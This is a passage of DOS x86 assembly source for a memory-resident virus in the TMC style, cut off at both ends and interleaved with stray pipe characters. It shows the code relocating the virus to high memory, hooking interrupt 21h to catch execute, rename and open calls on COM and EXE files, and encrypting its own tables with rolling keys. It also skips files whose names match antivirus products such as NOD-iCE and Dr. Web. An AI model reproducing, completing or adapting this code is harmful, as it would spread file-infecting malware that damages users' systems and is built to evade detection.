dw 0bf0h ; Pointer to virus_lengt
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,4000h ; SI = offset of next virus genera...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor di,di ; Zero DI
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
rep movsb ; Move virus to top of memory
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov cl,04h ; Divide by paragraphs
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shr di,cl ; DI = length of next virus genera...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc di ; Increase length of next virus ge...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov bx,[bp+1234h] ; BX = size of memory block in par...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1394h ; Pointer to mcb_size___
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
sub bx,[bp+1234h] ; Subtract new size in paragraphs ...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1393h ; Pointer to new_mcb_siz
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub bx,di ; Subtract length of next virus ge...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec bx ; Decrease new size in paragraphs
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec bx ; Decrease new size in paragraphs
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp bx,di ; Insufficient memory?
|
|||
|
|
|||
|
db 01110010b+10000000b ; Below? Jump to virus_exit_
|
|||
|
dw 65h ; Pointer to virus_exit_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,4ah ; Resize memory block
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to virus_exit_
|
|||
|
dw 65h ; Pointer to virus_exit_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov bx,di ; BX = number of paragraphs to all...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,48h ; Allocate memory
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to virus_exit_
|
|||
|
dw 65h ; Pointer to virus_exit_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec ax ; AX = segment of current Memory C...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov es,ax ; ES = segment of current Memory C...
|
|||
|
|
|||
|
db 07h ; Seven bytes instruction
|
|||
|
|
|||
|
mov word ptr es:[01h],08h
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop es ; Load ES from stack (AX)
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cx,[bp+1234h] ; CX = length of virus
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bf0h ; Pointer to virus_lengt
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor si,si ; Zero SI
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor di,di ; Zero DI
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
rep movsb ; Move virus to top of memory
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push es ; Save ES at stack
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
push [bp+1234h] ; Save offset of virus_exit_ at stack
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bf1h ; Pointer to vir_exit_of
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov al,[bp+1234h] ; AL = 8-bit encryption/decryption...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bd7h ; Pointer to crypt_key_
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov ah,[bp+1234h] ; AH = 8-bit sliding encrytion/dec...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bd8h ; Pointer to sliding_key_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
retf ; Return far
|
|||
|
|
|||
|
db 11101111b ; End of block
|
|||
|
terminate_ db 11101110b ; Beginning of block
|
|||
|
dw 0beeh ; Block identification of terminate_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,4c00h ; Terminate with return code
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 11101111b ; End of block
|
|||
|
get_rnd_num_ db 11101110b ; Beginning of block
|
|||
|
dw 0bd4h ; Block identification of get_rnd_...
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push cx ; Save CX at stack
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
in al,40h ; AL = 8-bit random number
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,al ; AH = 8-bit random number
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
in al,40h ; AL = 8-bit random number
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
xor ax,es:[01h] ; AX = 16-bit random number
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov cl,ah ; CL = high-order byte of 16-bit r...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
rol ax,cl ; AX = 16-bit random number
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov es:[01h],ax ; Store 16-bit random number
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop cx ; Load CX from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
ret ; Return
|
|||
|
|
|||
|
db 11101111b ; End of block
|
|||
|
rnd_in_rang db 11101110b ; Beginning of block
|
|||
|
dw 0bd5h ; Block identification of rnd_in_rang
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
or bp,bp ; Zero BP?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Zero? Jump to zero_range_
|
|||
|
dw 0bd6h ; Pointer to zero_range_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push dx ; Save DX at stack
|
|||
|
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0bd4h ; Pointer to get_rnd_num_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor dx,dx ; Zero DX
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
div bp ; DX = random number within range
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
xchg ax,dx ; AX = random number within range
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop dx ; Load DX from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
ret ; Return
|
|||
|
|
|||
|
db 11101111b ; End of block
|
|||
|
zero_range_ db 11101110b ; Beginning of block
|
|||
|
dw 0bd6h ; Block identification of zero_range_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor ax,ax ; AX = random number within range
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
ret ; Return
|
|||
|
|
|||
|
db 11101111b ; End of block
|
|||
|
decrypt_byt db 11101110b ; Beginning of block
|
|||
|
dw 0be0h ; Block identification of decrypt_byt
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov [bp+1234h],ah ; Store AH
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bd9h ; Pointer to ah__
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ax,si ; AX = offset within table
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub ax,bp ; Subtract delta offset from offse...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
sub ax,1234h ; Subtract offset of tmc_table_ fr...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 4c5h ; Pointer to tmc_table_
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mul word ptr [bp+1234h] ; AL = 8-bit sliding encryptio...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bd8h ; Pointer to sliding_key_
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
add al,[bp+1234h] ; AL = 8-bit encryption/decryption...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bd7h ; Pointer to crypt_key_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor al,[si] ; AL = byte of decrypted table
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov ah,[bp+1234h] ; AH = stored AH
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bd9h ; Pointer to ah__
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc si ; Increase offset within table
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
ret ; Return
|
|||
|
|
|||
|
db 11101111b ; End of block
|
|||
|
decrypt_id_ db 11101110b ; Beginning of block
|
|||
|
dw 0be1h ; Block identification of decrypt_id_
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0be0h ; Pointer to decrypt_byt
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,al ; AL = byte of decrypted table
|
|||
|
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0be0h ; Pointer to decrypt_byt
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xchg al,ah ; AL = byte of decrypted table
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
ret ; Return
|
|||
|
|
|||
|
db 11101111b ; End of block
|
|||
|
virus_exit_ db 11101110b ; Beginning of block
|
|||
|
dw 65h ; Block identification of virus_exit_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop es ; Load ES from stack
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,49h ; Free memory
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop bx ; Load BX from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ax ; Load AX from stack
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ds,ax ; DS = segment of PSP for current ...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov es,ax ; DS = segment of PSP for current ...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,4ah ; Resize memory block
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
lea bx,[bp+1234h] ; BX = offset of jmp_imm32_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1391h ; Pointer of jmp_imm32_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ax ; Load AX from stack (initial IP)
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cs:[bx+01h],ax ; Store initial IP
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ax ; Load AX from stack (initial CS ...)
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov cs:[bx+03h],ax ; Store initial CS relative to sta...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ax ; Load AX from stack (initial SP)
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ss ; Load SS from stack (initial SS ...)
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov sp,ax ; SP = stack pointer
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 1391h ; Pointer of jmp_imm32_
|
|||
|
db 11101111b ; End of block
|
|||
|
jmp_imm32_ db 11101110b ; Beginning of block
|
|||
|
dw 1391h ; Block identification of jmp_imm32_
|
|||
|
db 05h+10h ; Five bytes data
|
|||
|
db 11101010b ; JMP imm32 (opcode 0eah)
|
|||
|
dd 00h ; Pointer to virus in top of memory
|
|||
|
db 11101111b ; End of block
|
|||
|
ah__ db 11101110b ; Beginning of block
|
|||
|
dw 0bd9h ; Block identification of ah__
|
|||
|
db 01h+10h ; One byte data
|
|||
|
db 00h ; Accumulator register (high-orde...)
|
|||
|
db 11101111b ; End of block
|
|||
|
probability_ db 11101110b ; Beginning of block
|
|||
|
dw 0bech ; Block identification of probabil...
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 32h ; Probability
|
|||
|
db 11101111b ; End of block
|
|||
|
crypt_key_ db 11101110b ; Beginning of block
|
|||
|
dw 0bd7h ; Block identification of crypt_key_
|
|||
|
db 01h+10h ; One byte data
|
|||
|
db 00h ; 8-bit encryption/decryption key
|
|||
|
db 11101111b ; End of block
|
|||
|
sliding_key_ db 11101110b ; Beginning of block
|
|||
|
dw 0bd8h ; Block identification of sliding_...
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 00h ; 8-bit sliding encryption/decrypt...
|
|||
|
db 11101111b ; End of block
|
|||
|
executa_sta db 11101110b ; Beginning of block
|
|||
|
dw 1388h ; Block identification of executa_sta
|
|||
|
db 01h+10h ; One byte data
|
|||
|
db 00h ; Executable status
|
|||
|
db 11101111b ; End of block
|
|||
|
origin_code_ db 11101110b ; Beginning of block
|
|||
|
dw 1f40h ; Block identification of origin_c...
|
|||
|
db 03h+10h ; Three bytes data
|
|||
|
db 11000011b,00000010b dup(00h)
|
|||
|
db 11101111b ; End of block
|
|||
|
initial_cs_ db 11101110b ; Beginning of block
|
|||
|
dw 1389h ; Block identification of initial_cs_
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 0fff0h ; Initial CS relative to start of ...
|
|||
|
db 11101111b ; End of block
|
|||
|
initial_ss_ db 11101110b ; Beginning of block
|
|||
|
dw 138ah ; Block identification of initial_ss_
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 0fff0h ; Initial SS relative to start of ...
|
|||
|
db 11101111b ; End of block
|
|||
|
initial_ip_ db 11101110b ; Beginning of block
|
|||
|
dw 138bh ; Block identification of initial_ip_
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 100h ; Initial IP
|
|||
|
db 11101111b ; End of block
|
|||
|
incorrec_ip db 11101110b ; Beginning of block
|
|||
|
dw 1773h ; Block identification of incorrec_ip
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 100h ; Incorrect IP
|
|||
|
db 11101111b ; End of block
|
|||
|
initial_sp_ db 11101110b ; Beginning of block
|
|||
|
dw 138ch ; Block identification of initial_sp_
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 0fffeh ; Initial SP
|
|||
|
db 11101111b ; End of block
|
|||
|
new_mcb_siz db 11101110b ; Beginning of block
|
|||
|
dw 1393h ; Block identification of new_mcb_siz
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 1000h ; New size in paragraphs
|
|||
|
db 11101111b ; End of block
|
|||
|
mcb_size__ db 11101110b ; Beginning of block
|
|||
|
dw 1395h ; Block identification of mcb_size__
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 0ffffh ; Size of memory block in paragraphs
|
|||
|
db 11101111b ; End of block
|
|||
|
mcb_size___ db 11101110b ; Beginning of block
|
|||
|
dw 1394h ; Block identification of mcb_siz...
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 00h ; Size of memory block in paragraphs
|
|||
|
db 11101111b ; End of block
|
|||
|
program_seg_ db 11101110b ; Beginning of block
|
|||
|
dw 0befh ; Block identification of program_...
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 00h ; Segment of PSP for current process
|
|||
|
db 11101111b ; End of block
|
|||
|
virus_lengt db 11101110b ; Beginning of block
|
|||
|
dw 0bf0h ; Block identification of virus_lengt
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 00h ; Length of virus
|
|||
|
db 11101111b ; End of block
|
|||
|
vir_exit_of db 11101110b ; Beginning of block
|
|||
|
dw 0bf1h ; Block identification of vir_exit_of
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 00h ; Offset of virus_exit_
|
|||
|
db 11101111b ; End of block
|
|||
|
tmc_table_ db 11101110b ; Beginning of block
|
|||
|
dw 4c5h ; Block identification of tmc_table_
|
|||
|
db 11101111b ; End of block
|
|||
|
db 00h ; End of table
|
|||
|
second_table db 11101111b ; End of block
|
|||
|
virus_end:
|
|||
|
crypt_table db 11101110b ; Beginning of block
|
|||
|
dw 66h ; Block identification of crypt_table
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor bp,bp ; BP = delta offset
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push cs ; Save CS at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ds ; Load DS from stack
|
|||
|
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0bfeh ; Pointer to crypt_table_
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0bd4h ; Pointer to get_rnd_num_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],al ; Store 8-bit encryption/decryptio...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bd7h ; Pointer to crypt_key_
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],ah ; Store 8-bit sliding encryption/d...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bd8h ; Pointer to sliding_key_
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0bfeh ; Pointer to crypt_table_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,3521h ; Get interrupt vector 21h
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov di,1234h ; DI = offset of int21_jump
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0c9h ; Pointer to int21_jump
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov [di+01h],bx ; Store offset of interrupt 21h
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov [di+03h],es ; Store segment of interrupt 21h
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov dx,1234h ; DX = offset of int21_virus
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0c8h ; Pointer to int21_virus
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,2521h ; Set interrupt vector 21h
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 65h ; Pointer to virus_exit_
|
|||
|
db 11101111b ; End of block
|
|||
|
crypt_table_ db 11101110b ; Beginning of block
|
|||
|
dw 0bfeh ; Block identification of crypt_ta...
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,1234h ; SI = offset of tmc_table_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 4c5h ; Pointer to tmc_table_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov cx,(code_end-first_table)
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bffh ; Pointer to crypt_loop
|
|||
|
db 11101111b ; End of block
|
|||
|
crypt_loop db 11101110b ; Beginning of block
|
|||
|
dw 0bffh ; Block identification of crypt_lo...
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor [si],al ; Encrypt byte of table
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc si ; Increase offset within table
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
add al,ah ; Add 8-bit sliding encryption key...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec cx ; Decrease counter
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not zero? Jump to crypt_loop
|
|||
|
dw 0bffh ; Pointer to crypt_loop
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
ret ; Return
|
|||
|
|
|||
|
db 11101111b ; End of block
|
|||
|
int21_virus db 11101110b ; Beginning of block
|
|||
|
dw 0c8h ; Block identification of int21_virus
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push bx ; Save BX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push cx ; Save CX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push dx ; Save DX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push si ; Save SI at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push di ; Save DI at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ds ; Save DS at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push es ; Save ES at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
cld ; Clear direction flag
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ah,4bh ; Load and/or execute program?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to find_zero
|
|||
|
dw 1392h ; Pointer to find_zero
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ah,56h ; Rename file?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to find_zero
|
|||
|
dw 1392h ; Pointer to find_zero
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ah,3dh ; Open file?
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to int21_exit
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 1392h ; Pointer to find_zero
|
|||
|
db 11101111b ; End of block
|
|||
|
find_zero db 11101110b ; Beginning of block
|
|||
|
dw 1392h ; Block identification of find_zero
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ds ; Save DS at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop es ; Load ES from stack (DS)
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov di,dx ; DI = offset of filename
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov cx,43h ; CX = number of bytes to search t...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor al,al ; Zero AL
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
repne scasb ; Find end of filename
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to int21_exit
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
lea si,[di-05h] ; SI = offset of the dot in the fi...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
lodsw ; AX = two bytes of filename
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
or ax,2020h ; Lowercase characters
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov bx,'mo' ; COM executable
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,'c.' ; COM executable?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to examine_ext
|
|||
|
dw 0f0h ; Pointer to examine_ext
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov bx,'ex' ; EXE executable
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,'e.' ; EXE executable?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to examine_ext
|
|||
|
dw 0f0h ; Pointer to examine_ext
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 11101111b ; End of block
|
|||
|
examine_ext db 11101110b ; Beginning of block
|
|||
|
dw 0f0h ; Block identification of examine_ext
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
lodsw ; AX = two bytes of filename
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
or ax,2020h ; Lowercase characters
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp ax,bx ; COM or EXE executable?
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to examine_ext
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
sub si,04h ; SI = offset of the dot in the fi...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 1398h ; Pointer to find_name
|
|||
|
db 11101111b ; End of block
|
|||
|
find_name db 11101110b ; Beginning of block
|
|||
|
dw 1398h ; Block identification of find_name
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec si ; SI = offset within filename
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov al,[si] ; AL = byte of filename
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,'/' ; Beginning of filename?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to examine_name
|
|||
|
dw 1397h ; Pointer to examine_name
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,'\' ; Beginning of filename?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to examine_name
|
|||
|
dw 1397h ; Pointer to examine_name
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,':' ; Beginning of filename?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to examine_name
|
|||
|
dw 1397h ; Pointer to examine_name
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp si,dx ; Beginning of filename?
|
|||
|
|
|||
|
db 01110111b+10000000b ; Above? Jump to find_name
|
|||
|
dw 1398h ; Pointer to find_name
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec si ; SI = offset within filename
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 1397h ; Pointer to examine_name
|
|||
|
db 11101111b ; End of block
|
|||
|
examine_name db 11101110b ; Beginning of block
|
|||
|
dw 1397h ; Block identification of examine_...
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc si ; SI = offset of beginning of file...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
lodsw ; AX = two bytes of filename
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
or ax,2020h ; Lowercase characters
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
xor ax,0aa55h ; Encrypt two bytes of filename
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,('ci' xor 0aa55h)
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to int21_exit
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,('on' xor 0aa55h)
|
|||
|
|
|||
|
db 01110100b+10000000b ; NOD-iCE? Jump to int21_exit
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,('ew' xor 0aa55h)
|
|||
|
|
|||
|
db 01110100b+10000000b ; Dr. Web? Jump to int21_exit
|
|||
|
dw 0fbh ; Pointer to int21_exit
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
